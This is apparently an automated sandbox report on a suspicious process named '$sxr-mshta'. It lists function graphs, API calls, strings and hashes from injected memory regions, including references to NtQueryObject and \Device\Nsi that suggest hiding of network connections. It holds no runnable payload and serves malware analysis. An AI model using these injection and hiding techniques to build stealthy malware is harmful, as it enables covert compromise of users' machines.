16249->16248 16250 1acea2df8c6 16250->16240 16252 1acea2db978 __free_lconv_num 4 API calls 16250->16252 16251->16250 16263 1acea2dd120 16251->16263 16252->16240 16258 1acea2dd36c try_get_function 2 API calls 16257->16258 16259 1acea2dd79e 16258->16259 16262 1acea2dd7a3 16259->16262 16267 1acea2dd83c 16259->16267 16261 1acea2dd7ff LCMapStringW 16261->16262 16262->16243 16264 1acea2dd143 WideCharToMultiByte 16263->16264 16266 1acea2e30b0 16264->16266 16268 1acea2dd36c try_get_function 2 API calls 16267->16268 16269 1acea2dd86a 16268->16269 16269->16261 16271 1acea2dabe1 16270->16271 16272 1acea2dabeb 16270->16272 16271->16272 16277 1acea2dac06 16271->16277 16273 1acea2db8e0 _set_errno_from_matherr 4 API calls 16272->16273 16274 1acea2dabf2 16273->16274 16275 1acea2db7c0 _invalid_parameter_noinfo 6 API calls 16274->16275 16276 1acea2dabfe 16275->16276 16276->15835 16277->16276 16278 1acea2db8e0 _set_errno_from_matherr 4 API calls 16277->16278 16278->16274 16283 1acea2da781 16279->16283 16284 1acea2da738 16279->16284 16280 1acea2da7aa 16282 1acea2db978 __free_lconv_num 4 API calls 16280->16282 16281 1acea2db978 __free_lconv_num 4 API calls 16281->16283 16282->16284 16283->16280 16283->16281 16284->15837 16285 1ace90029a0 16286 1ace90029ce 16285->16286 16287 1ace9002a2c VirtualAlloc 16286->16287 16288 1ace9002a50 16286->16288 16287->16288 16289 7ff64e1d1500 16308 7ff64e1d19d4 16289->16308 16293 7ff64e1d154b 16294 7ff64e1d155d 16293->16294 16295 7ff64e1d1577 Sleep 16293->16295 16296 7ff64e1d156d _amsg_exit 16294->16296 16300 7ff64e1d1584 16294->16300 16295->16293 16296->16300 16297 7ff64e1d15fc _initterm 16299 7ff64e1d1619 _IsNonwritableInCurrentImage 16297->16299 16298 7ff64e1d15dd 16299->16298 16301 7ff64e1d167d 16299->16301 16302 7ff64e1d16f8 _ismbblead 16299->16302 16300->16297 16300->16298 16300->16299 16312 7ff64e1d1008 GetVersion 16301->16312 16302->16299 16305 7ff64e1d16cf 16305->16298 16307 7ff64e1d16d8 _cexit 16305->16307 16306 7ff64e1d16c7 exit 16306->16305 16307->16298 16309 7ff64e1d1509 GetStartupInfoW 16308->16309 16310 7ff64e1d1a00 6 API calls 16308->16310 16309->16293 16311 7ff64e1d1a7f 16310->16311 16311->16309 16313 7ff64e1d108f 16312->16313 16314 7ff64e1d1046 16312->16314 16348 7ff64e1d1378 16313->16348 16314->16313 16315 7ff64e1d104a GetModuleHandleW 16314->16315 16315->16313 16318 7ff64e1d1062 GetProcAddress 16315->16318 16318->16313 16320 7ff64e1d107d 16318->16320 16319 7ff64e1d1378 malloc 16321 7ff64e1d10b0 16319->16321 16320->16313 16322 7ff64e1d1323 16321->16322 16323 7ff64e1d10c8 LoadLibraryW 16321->16323 16325 7ff64e1d134a RegCloseKey 16322->16325 16326 7ff64e1d1356 16322->16326 16323->16322 16324 7ff64e1d10e7 GetProcAddress 16323->16324 16327 7ff64e1d1102 16324->16327 16328 7ff64e1d113f FreeLibrary 16324->16328 16325->16326 16326->16305 16326->16306 16327->16328 16328->16322 16329 7ff64e1d1157 RegOpenKeyExA 16328->16329 16329->16322 16330 7ff64e1d118d RegQueryValueExA 16329->16330 16330->16322 16331 7ff64e1d11bc 16330->16331 16332 7ff64e1d11c4 ExpandEnvironmentStringsA 16331->16332 16333 7ff64e1d11e7 LoadLibraryA 16331->16333 16332->16322 16334 7ff64e1d11e4 16332->16334 16335 7ff64e1d1208 16333->16335 16334->16333 16336 7ff64e1d1220 RegCloseKey 16335->16336 16337 7ff64e1d1231 GetModuleHandleW 16335->16337 16336->16337 16338 7ff64e1d124d GetProcAddress 16337->16338 16347 7ff64e1d12d1 16337->16347 16340 7ff64e1d126b 16338->16340 16338->16347 16339 7ff64e1d12e6 GetProcAddress 16341 7ff64e1d1314 FreeLibrary 16339->16341 16342 7ff64e1d1301 16339->16342 16343 7ff64e1d1378 malloc 16340->16343 16341->16322 16342->16341 16344 7ff64e1d1296 16343->16344 16345 7ff64e1d129e MultiByteToWideChar 16344->16345 16344->16347 16346 7ff64e1d12c3 UnregisterApplicationRestart 16345->16346 16345->16347 16346->16347 16347->16322 16347->16339 16349 7ff64e1d1396 malloc 16348->16349 16350 7ff64e1d10a6 16349->16350 16351 7ff64e1d1387 16349->16351 16350->16319 16351->16349 16351->16350 16352 7ff64e1d14b0 __getmainargs 16353 1acea2db900 16358 1acea2db911 _set_errno_from_matherr 16353->16358 16354 1acea2db962 16357 1acea2db8e0 _set_errno_from_matherr 3 API calls 16354->16357 16355 1acea2db946 HeapAlloc 16356 1acea2db960 16355->16356 16355->16358 16357->16356 16358->16354 16358->16355

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 7ff64e1d1008-7ff64e1d1044 GetVersion 1 7ff64e1d108f-7ff64e1d10b9 call 7ff64e1d1378 * 2 0->1 2 7ff64e1d1046-7ff64e1d1048 0->2 10 7ff64e1d10bf-7ff64e1d10c2 1->10 11 7ff64e1d1330-7ff64e1d1333 1->11 2->1 3 7ff64e1d104a-7ff64e1d1060 GetModuleHandleW 2->3 3->1 6 7ff64e1d1062-7ff64e1d107b GetProcAddress 3->6 6->1 8 7ff64e1d107d-7ff64e1d1085 6->8 8->1 12 7ff64e1d1323-7ff64e1d1326 10->12 13 7ff64e1d10c8-7ff64e1d10e1 LoadLibraryW 10->13 14 7ff64e1d1335-7ff64e1d1338 call 7ff64e1d13b8 11->14 15 7ff64e1d133d-7ff64e1d1348 11->15 12->11 17 7ff64e1d1328-7ff64e1d132b call 7ff64e1d13b8 12->17 13->12 16 7ff64e1d10e7-7ff64e1d1100 GetProcAddress 13->16 14->15 19 7ff64e1d134a-7ff64e1d1351 RegCloseKey 15->19 20 7ff64e1d1356-7ff64e1d136f 15->20 21 7ff64e1d1102-7ff64e1d111b 16->21 22 7ff64e1d113f-7ff64e1d1151 FreeLibrary 16->22 17->11 19->20 25 7ff64e1d1125-7ff64e1d1129 21->25 22->12 24 7ff64e1d1157-7ff64e1d1187 RegOpenKeyExA 22->24 24->12 26 7ff64e1d118d-7ff64e1d11b6 RegQueryValueExA 24->26 25->22 27 7ff64e1d112b-7ff64e1d113c 25->27 26->12 28 7ff64e1d11bc-7ff64e1d11c2 26->28 27->22 29 7ff64e1d11c4-7ff64e1d11de ExpandEnvironmentStringsA 28->29 30 7ff64e1d11e7-7ff64e1d121e LoadLibraryA call 7ff64e1d13b8 * 2 28->30 29->12 32 7ff64e1d11e4 29->32 36 7ff64e1d1220-7ff64e1d122c RegCloseKey 30->36 37 7ff64e1d1231-7ff64e1d1247 GetModuleHandleW 30->37 32->30 36->37 38 7ff64e1d12e1-7ff64e1d12e4 37->38 39 7ff64e1d124d-7ff64e1d1269 GetProcAddress 37->39 38->15 40 7ff64e1d12e6-7ff64e1d12ff GetProcAddress 38->40 41 7ff64e1d126b-7ff64e1d126f 39->41 42 7ff64e1d12dd 39->42 43 7ff64e1d1314-7ff64e1d131e FreeLibrary 40->43 44 7ff64e1d1301-7ff64e1d130b 40->44 45 7ff64e1d1272-7ff64e1d1279 41->45 42->38 43->12 44->43 45->45 46 7ff64e1d127b-7ff64e1d129c call 7ff64e1d1378 45->46 49 7ff64e1d129e-7ff64e1d12c1 MultiByteToWideChar 46->49 50 7ff64e1d12d9 46->50 51 7ff64e1d12c3-7ff64e1d12cb UnregisterApplicationRestart 49->51 52 7ff64e1d12d1-7ff64e1d12d4 call 7ff64e1d13b8 49->52 50->42 51->52 52->50
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleLoadModule$ApplicationByteCharEnvironmentExpandMultiOpenQueryRestartStringsUnregisterValueVersionWide
                                                                                                            • String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
                                                                                                            • API String ID: 964684844-3560873152
                                                                                                            • Opcode ID: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                            • Instruction ID: 6f1a2729b29337540d7ef69ce0483aad55ede80e8dabb7a75036e3ac329fe8fd
                                                                                                            • Opcode Fuzzy Hash: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                            • Instruction Fuzzy Hash: D9914235B4C64296FB14BB61A84097976A1FF59BA4B448334EE2E877D4DF3CF445CA00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 54 7ff64e1d1500-7ff64e1d1549 call 7ff64e1d19d4 GetStartupInfoW 58 7ff64e1d154b-7ff64e1d1556 54->58 59 7ff64e1d1562-7ff64e1d156b 58->59 60 7ff64e1d1558-7ff64e1d155b 58->60 63 7ff64e1d1584-7ff64e1d158c 59->63 64 7ff64e1d156d-7ff64e1d1575 _amsg_exit 59->64 61 7ff64e1d155d 60->61 62 7ff64e1d1577-7ff64e1d1582 Sleep 60->62 61->59 62->58 66 7ff64e1d158e-7ff64e1d15ab 63->66 67 7ff64e1d15e7 63->67 65 7ff64e1d15f1-7ff64e1d15fa 64->65 68 7ff64e1d15fc-7ff64e1d160f _initterm 65->68 69 7ff64e1d1619-7ff64e1d161b 65->69 70 7ff64e1d15af-7ff64e1d15b2 66->70 67->65 68->69 71 7ff64e1d161d-7ff64e1d161f 69->71 72 7ff64e1d1626-7ff64e1d162e 69->72 73 7ff64e1d15b4-7ff64e1d15b6 70->73 74 7ff64e1d15d9-7ff64e1d15db 70->74 71->72 76 7ff64e1d1630-7ff64e1d163e call 7ff64e1d1940 72->76 77 7ff64e1d165a-7ff64e1d1669 72->77 75 7ff64e1d15dd-7ff64e1d15e2 73->75 78 7ff64e1d15b8-7ff64e1d15bc 73->78 74->65 74->75 80 7ff64e1d1744-7ff64e1d1759 75->80 76->77 92 7ff64e1d1640-7ff64e1d1650 76->92 79 7ff64e1d166d-7ff64e1d1673 77->79 82 7ff64e1d15ce-7ff64e1d15d7 78->82 83 7ff64e1d15be-7ff64e1d15ca 78->83 84 7ff64e1d1675-7ff64e1d1677 79->84 85 7ff64e1d16e6-7ff64e1d16e9 79->85 82->70 83->82 88 7ff64e1d167d-7ff64e1d1682 84->88 89 7ff64e1d1679-7ff64e1d167b 84->89 90 7ff64e1d16eb-7ff64e1d16f4 85->90 91 7ff64e1d16f8-7ff64e1d1700 _ismbblead 85->91 95 7ff64e1d1684-7ff64e1d168e 88->95 96 7ff64e1d1690-7ff64e1d16b3 call 7ff64e1d1008 88->96 89->85 89->88 90->91 93 7ff64e1d1702-7ff64e1d1705 91->93 94 7ff64e1d170a-7ff64e1d1712 91->94 92->77 93->94 94->79 94->80 95->88 98 7ff64e1d16b8-7ff64e1d16c5 96->98 99 7ff64e1d16cf-7ff64e1d16d6 98->99 100 7ff64e1d16c7-7ff64e1d16c9 exit 98->100 101 7ff64e1d16e4 99->101 102 7ff64e1d16d8-7ff64e1d16de _cexit 99->102 100->99 101->80 102->101
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 2995914023-0
                                                                                                            • Opcode ID: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                            • Instruction ID: 9ce18431be7ac1266546f5b5290e517e13c0bd4919b75c8b07c04d19a30ae9fb
                                                                                                            • Opcode Fuzzy Hash: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                            • Instruction Fuzzy Hash: 0D51157AB8C64686F760BB21E840B7923A0AB65744F584235FA5EC36A1DF7CF845CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3328510275-0
                                                                                                            • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction ID: d7e44de80ec280aac5274c655e623d31870291c3fec4d6edb48b5ed20f94a573
                                                                                                            • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction Fuzzy Hash: 8921FB31B17B5086E6609F166404299BBA4FB85BD1F485224DE8D37BDBDF38C4518781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 126 7ff64e1d14b0-7ff64e1d14f8 __getmainargs
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __getmainargs
                                                                                                            • String ID:
                                                                                                            • API String ID: 3565562838-0
                                                                                                            • Opcode ID: cdd84e5d3e8c1246c9bff8370a8ef8597eefc2c4ea14271d2e770916b66b2895
                                                                                                            • Instruction ID: 3a66ebd7201b44840360df93bb57a1999369df8448cf2c3f9572efc7e56f2eae
                                                                                                            • Opcode Fuzzy Hash: cdd84e5d3e8c1246c9bff8370a8ef8597eefc2c4ea14271d2e770916b66b2895
                                                                                                            • Instruction Fuzzy Hash: D9E0527CE8D64B96EB10BB50A8408B93760BB25744B804032E50D93220DE3CB209CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 127 1ace90029a0-1ace9002a0b call 1ace9000f34 * 4 136 1ace9002a11-1ace9002a14 127->136 137 1ace9002c23 127->137 136->137 139 1ace9002a1a-1ace9002a1d 136->139 138 1ace9002c25-1ace9002c41 137->138 139->137 140 1ace9002a23-1ace9002a26 139->140 140->137 141 1ace9002a2c-1ace9002a4a VirtualAlloc 140->141 141->137 142 1ace9002a50-1ace9002a74 call 1ace9000d6c 141->142 145 1ace9002aa3-1ace9002aaa 142->145 146 1ace9002a76-1ace9002aa1 call 1ace9000d6c 142->146 148 1ace9002ab0-1ace9002abd 145->148 149 1ace9002b4a-1ace9002b51 145->149 146->145 148->149 150 1ace9002ac3-1ace9002ad1 148->150 152 1ace9002c04-1ace9002c21 149->152 153 1ace9002b57-1ace9002b6e 149->153 160 1ace9002ad3-1ace9002add 150->160 161 1ace9002b35-1ace9002b3d 150->161 152->138 153->152 154 1ace9002b74 153->154 155 1ace9002b7a-1ace9002b8f 154->155 158 1ace9002b91-1ace9002ba2 155->158 159 1ace9002bf3-1ace9002bfe 155->159 162 1ace9002bad-1ace9002bb1 158->162 163 1ace9002ba4-1ace9002bab 158->163 159->152 159->155 164 1ace9002ae0-1ace9002ae4 160->164 161->150 165 1ace9002b3f-1ace9002b44 161->165 168 1ace9002bbc-1ace9002bc0 162->168 169 1ace9002bb3-1ace9002bba 162->169 167 1ace9002be0-1ace9002bf1 163->167 170 1ace9002b32 164->170 171 1ace9002ae6-1ace9002aea 164->171 165->149 167->158 167->159 172 1ace9002bd2-1ace9002bd6 168->172 173 1ace9002bc2-1ace9002bd0 168->173 169->167 170->161 174 1ace9002aec-1ace9002b13 171->174 175 1ace9002b15-1ace9002b1f 171->175 172->167 177 1ace9002bd8-1ace9002bdb 172->177 173->167 176 1ace9002b25-1ace9002b30 174->176 175->176 176->164 177->167
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 967f5a60b1285b5eef8a28cd2e8c1313bc106c537eda0a7a65d4cc7fb4b1b414
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: B161367270225087EF68CF99D4507EDFBA2FB4AB94F848825DA0987785DB38D852C742
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 178 1acea2db900-1acea2db90f 179 1acea2db911-1acea2db91d 178->179 180 1acea2db91f-1acea2db92f 178->180 179->180 181 1acea2db962-1acea2db96d call 1acea2db8e0 179->181 182 1acea2db946-1acea2db95e HeapAlloc 180->182 188 1acea2db96f-1acea2db974 181->188 183 1acea2db931-1acea2db938 call 1acea2de6f0 182->183 184 1acea2db960 182->184 183->181 190 1acea2db93a-1acea2db944 call 1acea2d9dc4 183->190 184->188 190->181 190->182
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction ID: 83df6916cc1239768e0931c53856f4ddedb9e0b88209bf89eccc87a24bbd9ebf
                                                                                                            • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction Fuzzy Hash: 9BF090747032C488FE555B6E96613D51A805B4BB82F0C8434C90EB63D3DD2DC4808693
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 193 1acea2db978-1acea2db97b 194 1acea2db9b4 193->194 195 1acea2db97d-1acea2db996 HeapFree 193->195 196 1acea2db998 call 1acea2db8e0 195->196 197 1acea2db9af-1acea2db9b3 195->197 196->197 197->194
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction ID: 333e2d96aa62b3b99d42db3355980e81897da702e772fe3cb6e74ba7cf284712
                                                                                                            • Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
                                                                                                            • Instruction Fuzzy Hash: 85D02270B030808AFF1997EF68613F009405F97B87F04C028CC0CB1253EA0144D046C3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 199 1ace8af0fc1 200 1ace8af0fc3-1ace8af0fd4 199->200
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3379031607.000001ACE8AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001ACE8AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace8af0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                            • Instruction ID: 221c8e864b36e7735be923a6526a0bd4c90093ff6b0ac4698a62851cba458ce5
                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                            • Instruction Fuzzy Hash: 1B90021459740655D41512910C4629D64406389350FD444904416A0144D58D02A653A3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 299 1acea2d2d78-1acea2d2df1 call 1acea2eecc0 302 1acea2d2df7-1acea2d2dfd 299->302 303 1acea2d312c-1acea2d314f 299->303 302->303 304 1acea2d2e03-1acea2d2e06 302->304 304->303 305 1acea2d2e0c-1acea2d2e0f 304->305 305->303 306 1acea2d2e15-1acea2d2e25 GetModuleHandleA 305->306 307 1acea2d2e39 306->307 308 1acea2d2e27-1acea2d2e37 GetProcAddress 306->308 309 1acea2d2e3c-1acea2d2e5a 307->309 308->309 309->303 311 1acea2d2e60-1acea2d2e7f StrCmpNIW 309->311 311->303 312 1acea2d2e85-1acea2d2e89 311->312 312->303 313 1acea2d2e8f-1acea2d2e99 312->313 313->303 314 1acea2d2e9f-1acea2d2ea6 313->314 314->303 315 1acea2d2eac-1acea2d2ebf 314->315 316 1acea2d2ec1-1acea2d2ecd 315->316 317 1acea2d2ecf 315->317 318 1acea2d2ed2-1acea2d2ed6 316->318 317->318 319 1acea2d2ed8-1acea2d2ee4 318->319 320 1acea2d2ee6 318->320 321 1acea2d2ee9-1acea2d2ef3 319->321 320->321 322 1acea2d2fe9-1acea2d2fed 321->322 323 1acea2d2ef9-1acea2d2efc 321->323 324 1acea2d2ff3-1acea2d2ff6 322->324 325 1acea2d311e-1acea2d3126 322->325 326 1acea2d2f0e-1acea2d2f18 323->326 327 1acea2d2efe-1acea2d2f0b call 1acea2d1a14 323->327 330 1acea2d2ff8-1acea2d3004 call 1acea2d1a14 324->330 331 1acea2d3007-1acea2d3011 324->331 325->303 325->315 328 1acea2d2f1a-1acea2d2f27 326->328 329 1acea2d2f4c-1acea2d2f56 326->329 327->326 328->329 333 1acea2d2f29-1acea2d2f36 328->333 334 1acea2d2f58-1acea2d2f65 329->334 335 1acea2d2f86-1acea2d2f89 329->335 330->331 337 1acea2d3041-1acea2d3044 331->337 338 1acea2d3013-1acea2d3020 331->338 342 1acea2d2f39-1acea2d2f3f 333->342 334->335 343 1acea2d2f67-1acea2d2f74 334->343 344 1acea2d2f8b-1acea2d2f95 call 1acea2d1d28 335->344 345 1acea2d2f97-1acea2d2fa4 lstrlenW 335->345 340 1acea2d3046-1acea2d304f call 1acea2d1d28 337->340 341 1acea2d3051-1acea2d305e lstrlenW 337->341 338->337 347 1acea2d3022-1acea2d302f 338->347 340->341 360 1acea2d3096-1acea2d30a1 340->360 351 1acea2d3081-1acea2d308b call 1acea2d39d0 341->351 352 1acea2d3060-1acea2d306a 341->352 349 1acea2d2f45-1acea2d2f4a 342->349 350 1acea2d2fdf-1acea2d2fe4 342->350 353 1acea2d2f77-1acea2d2f7d 343->353 344->345 344->350 355 1acea2d2fc7-1acea2d2fd9 call 1acea2d39d0 345->355 356 1acea2d2fa6-1acea2d2fb0 345->356 357 1acea2d3032-1acea2d3038 347->357 349->329 349->342 363 1acea2d308e-1acea2d3090 350->363 351->363 352->351 364 1acea2d306c-1acea2d307f call 1acea2d1554 352->364 353->350 365 1acea2d2f7f-1acea2d2f84 353->365 355->350 355->363 356->355 358 1acea2d2fb2-1acea2d2fc5 call 1acea2d1554 356->358 359 1acea2d303a-1acea2d303f 357->359 357->360 358->350 358->355 359->337 359->357 372 1acea2d3118-1acea2d311c 360->372 373 1acea2d30a3-1acea2d30a7 360->373 363->325 363->360 364->351 364->360 365->335 365->353 372->325 374 1acea2d30a9-1acea2d30ad 373->374 375 1acea2d30af-1acea2d30c9 call 1acea2d8740 373->375 374->375 378 1acea2d30cc-1acea2d30cf 374->378 375->378 381 1acea2d30d1-1acea2d30ef call 1acea2d8740 378->381 382 1acea2d30f2-1acea2d30f5 378->382 381->382 382->372 384 1acea2d30f7-1acea2d3115 call 1acea2d8740 382->384 384->372
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                            • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction ID: 35a1bed24b142ae761158cbd6255e29769bcfeccd1271f0b0450a59f2a7e0adf
                                                                                                            • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction Fuzzy Hash: 56B1D1323126918AEB598F2DD5407E97BA4FB42B86F14901AEE4D63B96DF35CC80C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
